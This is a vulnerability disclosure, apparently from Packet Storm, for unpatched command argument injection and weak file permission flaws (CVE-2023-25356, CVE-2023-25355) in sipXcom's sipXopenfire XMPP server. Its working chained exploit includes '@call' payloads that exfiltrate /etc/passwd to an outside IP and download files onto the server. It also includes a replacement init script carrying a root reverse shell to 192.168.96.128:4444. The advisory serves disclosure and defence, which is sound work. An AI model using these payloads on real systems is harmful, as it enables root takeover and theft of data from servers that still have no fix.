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## https://sploitus.com/exploit?id=PACKETSTORM:171281
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Product: sipXcom sipXopenfire  
Vendor: CoreDial  
Name: "sipXcom sipXopenfire XMPP message system command   
argument injection and insecure service file   
permissions RCE"  
Version: 21.04 and earlier  
Fixed: Nope, no response  
Link: http://download.sipxcom.org/  
CVEs: CVE-2023-25355 & CVE-2023-25356  
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TL;DR  
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CoreDial's sipXcom is a PBX server. It bundles an XMPP server   
component sipXopenfire, which is disabled by default. sipXopenfire   
is affected by an OS command argument injection vulnerability   
(CVE-2023-25356), which allows any user with an XMPP account to pass   
arbitrary arguments to a curl command. The same component is also   
affected by a weak file permissions vulnerability (CVE-2023-25355),   
affecting a service startup script which runs as root. Both issues   
can be chained to execute commands as the system root user.  
  
At the time of this disclosure, we have had no response from   
CoreDial, and neither issue has been fixed.   
  
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CVE-2023-25356: OS Command Argument Injection  
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As part of the initializePlugin() routine in   
sipXopenfire\presence-plugin\src\org\sipfoundry\openfire\plugin\presence\SipXOpenfirePlugin.java,   
an "interceptor" called DefaultMessagePacketInterceptor is   
registered.  
  
The DefaultMessagePacketInterceptor inspects every message that's   
sent through the XMPP server. If a message starts with any of the   
strings "@call", "@conf" or "@xfer" (referred to internally as   
"directives"), a related code path is taken, where the message   
content is processed according to what the specific directive is   
meant to achieve.  
  
When a message is intercepted which starts with "@call", all the   
text after this string is assumed to be a phone number and passed to  
the buildRestCallCommand() function. This function creates a long   
URL, which the user input is written directly into. There's no   
particular attempt to sanitise this input.   
  
This URL is then passed to the sendRestRequest() function, where it   
is appended to a curl command string. This string is then passed to   
Runtime.getRuntime().exec(command).  
  
Due to the inner mechanics of Runtime's exec() function, we are only  
able to control arguments passed to the main curl command.  
  
The constructed curl command is as follows:  
  
```  
curl -k -X POST http://[IPAddress]:[Port]/callcontroller/[callerNumber]/[controlledString]timeout=30&isForwardingAllowed=true  
```  
  
Since we can inject arbitrary arguments, we can construct a set of   
arguments which will read a file using the -d/--data flag, and send   
it over the network to us. The only limitation is that the   
sipXopenfire process runs as the daemon user. So we can only read   
files that are accessible to daemon. However, this includes   
potentially interesting files, like the chat history  
(/opt/openfire/logs/sipxopenfire-im.log) when chat logging is   
enabled.  
  
As proof-of-concept, the following payload will read /etc/passwd   
and post it to http://192.168.96.128/abc.  
  
```  
@call abc -o/tmp/test123 -d @/etc/passwd http://192.168.96.128/abc  
```  
  
We can also download files and write them to the server filesystem.   
The following will download the file from   
http://192.168.96.128/test.txt and write it to /tmp/test.txt  
  
```  
@call abc -o /tmp/dummy -o /tmp/test.txt -X GET http://192.168.96.128/test.txt -o /tmp/dummy  
```  
  
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CVE-2023-25355: Weak Service File Permissions  
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The /etc/init.d/openfire service file is owned by the daemon user and  
group, but runs as the root user. This gives a relatively clear   
path to privilege escalation.   
  
It also provides a very useful exploitation path, when chained with   
the curl argument injection issue.  
  
Since we can download files and write them to the filesystem, and   
the sipXopenfire process runs as the daemon user, we can overwrite   
the /etc/init.d/openfire file with a modified version.  
  
The following modified /etc/init.d/openfire will return a shell to   
port 4444 on 192.168.96.128 when the sipXopenfire service is   
(re)started.   
  
```  
#!/bin/sh  
#  
# openfire Stops and starts the Openfire XMPP service.  
#  
# chkconfig: 2345 99 1  
# description: Openfire is an XMPP server, which is a server that facilitates \  
# XML based communication, such as chat.  
# config: /opt/openfire/conf/openfire.xml  
# config: /etc/sysconfig/openfire  
# pidfile: /var/run/openfire.pid  
#  
# This script has currently been tested on Redhat, CentOS, and Fedora based  
# systems.  
#  
  
#####  
# Begin setup work  
#####  
  
# Initialization  
PATH="/sbin:/bin:/usr/bin:/usr/sbin"  
RETVAL=0  
  
# Check that we are root ... so non-root users stop here.  
if [ "`id -u`" != 0 ]; then  
echo $0 must be run as root  
exit 1  
fi  
  
su -s /bin/sh -c "bash -i >& /dev/tcp/192.168.96.128/4444 0>&1"  
  
# Get config.  
[ -f "/etc/sysconfig/openfire" ] && . /etc/sysconfig/openfire  
if [ -f "/etc/init.d/functions" ]; then  
FUNCTIONS_FOUND=true  
. /etc/init.d/functions  
fi  
  
# If openfire user is not set in sysconfig, set to daemon.  
[ -z "$OPENFIRE_USER" ] && OPENFIRE_USER="daemon"  
  
# If pid file path is not set in sysconfig, set to /var/run/openfire.pid.  
[ -z "$OPENFIRE_PIDFILE" ] && OPENFIRE_PIDFILE="/var/run/openfire.pid"  
  
# -----------------------------------------------------------------  
  
# If a openfire home variable has not been specified, try to determine it.  
if [ -z "$OPENFIRE_HOME" -o ! -d "$OPENFIRE_HOME" ]; then  
if [ -d "/usr/share/openfire" ]; then  
OPENFIRE_HOME="/usr/share/openfire"  
elif [ -d "/usr/local/openfire" ]; then  
OPENFIRE_HOME="/usr/local/openfire"  
elif [ -d "/opt/openfire" ]; then  
OPENFIRE_HOME="/opt/openfire"  
else  
echo "Could not find Openfire installation under /opt, /usr/share, or /usr/local."  
echo "Please specify the Openfire installation location as variable OPENFIRE_HOME"  
echo "in /etc/sysconfig/openfire."  
exit 1  
fi  
fi  
  
# If log path is not set in sysconfig, set to $OPENFIRE_HOME/logs.  
[ -z "$OPENFIRE_LOGDIR" ] && OPENFIRE_LOGDIR="${OPENFIRE_HOME}/logs"  
  
# Attempt to locate java installation.  
if [ -z "$JAVA_HOME" ]; then  
if [ -d "${OPENFIRE_HOME}/jre" ]; then  
JAVA_HOME="${OPENFIRE_HOME}/jre"  
elif [ -d "/etc/alternatives/jre" ]; then  
JAVA_HOME="/etc/alternatives/jre"  
else  
jdks=`ls -r1d /usr/java/j*`  
for jdk in $jdks; do  
if [ -f "${jdk}/bin/java" ]; then  
JAVA_HOME="$jdk"  
break  
fi  
done  
fi  
fi  
JAVACMD="${JAVA_HOME}/bin/java"  
  
if [ ! -d "$JAVA_HOME" -o ! -x "$JAVACMD" ]; then  
echo "Error: JAVA_HOME is not defined correctly."  
echo " Can not sure execute $JAVACMD."  
exit 1  
fi  
  
# Prepare location of openfire libraries  
OPENFIRE_LIB="${OPENFIRE_HOME}/lib"  
  
# Prepare openfire command line  
OPENFIRE_OPTS="${OPENFIRE_OPTS} -DopenfireHome=${OPENFIRE_HOME} -Dopenfire.lib.dir=${OPENFIRE_LIB}"  
  
# Prepare local java class path  
if [ -z "$LOCALCLASSPATH" ]; then  
LOCALCLASSPATH="${OPENFIRE_LIB}/startup.jar"  
else  
LOCALCLASSPATH="${OPENFIRE_LIB}/startup.jar:${LOCALCLASSPATH}"  
fi  
  
# Export any necessary variables  
export JAVA_HOME JAVACMD  
  
# Lastly, prepare the full command that we are going to run.  
OPENFIRE_RUN_CMD="${JAVACMD} -server ${OPENFIRE_OPTS} -classpath \"${LOCALCLASSPATH}\" -jar \"${OPENFIRE_LIB}/startup.jar\""  
  
#####  
# End setup work  
#####  
  
start() {  
OLD_PWD=`pwd`  
cd $OPENFIRE_LOGDIR  
  
PID=$(findPID)  
if [ -n "$PID" ]; then   
echo "Openfire is already running."   
RETVAL=1   
return   
fi   
  
# Start daemons.   
echo -n "Starting openfire: "   
  
rm -f nohup.out  
su -s /bin/sh -c "nohup $OPENFIRE_RUN_CMD > $OPENFIRE_LOGDIR/nohup.out 2>&1 &" $OPENFIRE_USER  
RETVAL=$?  
  
echo  
  
[ $RETVAL -eq 0 -a -d /var/lock/subsys ] && touch /var/lock/subsys/openfire  
  
sleep 1 # allows prompt to return  
cd $OLD_PWD  
}  
  
stop() {  
# Stop daemons.  
echo -n "Shutting down openfire: "  
  
PID=$(findPID)  
if [ -n "$PID" ]; then  
if [ -n "$FUNCTIONS_FOUND" ]; then  
echo $PID > $OPENFIRE_PIDFILE  
# delay copied from restart  
killproc -p $OPENFIRE_PIDFILE -d 10  
rm -f $OPENFIRE_PIDFILE  
else  
kill $PID  
fi  
else  
echo "Openfire is not running."  
fi  
  
RETVAL=$?  
echo  
  
[ $RETVAL -eq 0 -a -f "/var/lock/subsys/openfire" ] && rm -f /var/lock/subsys/openfire  
}  
  
restart() {  
stop  
sleep 10 # give it a few moments to shut down  
start  
}  
  
condrestart() {  
[ -e "/var/lock/subsys/openfire" ] && restart  
return 0  
}  
  
status() {  
PID=$(findPID)  
if [ -n "$PID" ]; then  
echo "openfire is running"  
RETVAL=0  
else  
echo "openfire is not running"  
RETVAL=1  
fi  
}  
  
findPID() {  
echo `ps ax --width=1000 | grep openfire | grep startup.jar | awk '{print $1}'`  
}  
  
# Handle how we were called.  
case "$1" in  
start)  
start  
;;  
stop)  
stop  
;;  
restart)  
restart  
;;  
condrestart)  
condrestart  
;;  
reload)  
restart  
;;  
status)  
status  
;;  
*)  
echo "Usage $0 {start|stop|restart|status|condrestart|reload}"  
RETVAL=1  
esac  
  
exit $RETVAL  
  
```  
  
When served as openfire.txt from a web server (in this case, on   
192.168.96.128), the curl argument injection can be exploited as so   
to overwrite the original /etc/init.d/openfire script.  
  
```  
@call abc -o /tmp/dummy -o /etc/init.d/openfire -X GET http://192.168.96.128/openfire.txt -o /tmp/dummy  
```  
  
Once this file is overwritten, we should wait for the sipXopenfire   
service to be restarted. This might be from a server reboot, or from  
an administrator restarting the sipXopenfire service itself. When   
the service does restart, we will get a shell back as the root user.  
  
To make the exploitation more convenient, we could trigger the   
sipXopenfire service reload ourselves, if we also have credentials   
for the superadmin user on the sipXcom web configuration service.   
  
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Errata & Disclosure Timeline  
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These issues were found at the end of October 2022. Initial contact   
attempts began on November 2nd 2022.  
  
sipXcom has a Wiki page that describes how to go about reporting   
issues. The recommended way is to file a bug on the Jira board,   
while setting "the 'Security' level in the New Issue to 'Security   
Issue'". I created a Jira account, tried to create an issue, and   
could not find the "Security" level option. I also noticed that it  
was not possible to tag an issue with any version later than 17.04,  
and there had also not been any meaningful activity on the tracker  
since November 2021 - about a year before I started the disclosure  
process.   
  
Since this recommended disclosure avenue seemed dead/unreliable, I  
decided to directly privately approach whichever organisation was  
responsible for sipXcom. I tried contacting eZuce who, at the time  
of the initial disclosure attempt, were mentioned extensively in the  
Wiki. I made several attempts at contact using the eZuce contact   
form.   
  
In the meantime, I noticed that the release notes for the latest   
sipXcom release started with the sentence "CoreDial is pleased to   
announce the GA release of sipXcom 21.04." It appears that eZuce,   
who had been the previous maintainers of sipXcom, were acquired by   
CoreDial in 2020. This implies that communications made to sipXcom   
or eZuce would make their way to CoreDial.  
  
After a few weeks with no response from the sipXcom/eZuce contact  
forms, I tried to make direct contact on Twitter. I also included   
the CoreDial account in this, and all subsequent tweets. I also   
tried to email CoreDial directly. My first attempt to contact   
CoreDial directly was December 1st 2022.   
  
At the time of this disclosure, I have sent several emails to,   
and tweets directed at, CoreDial. In each of the tweets, CoreDial  
untagged themselves, and never responded.  
  
I consider all these reasonable attempts to get the attention of  
CoreDial. I would have much preferred that they fix the issues in  
sipXcom before this disclosure. However, I encountered an active  
lack of interest, so am also comfortable in this case fully   
disclosing technical details without any public fix.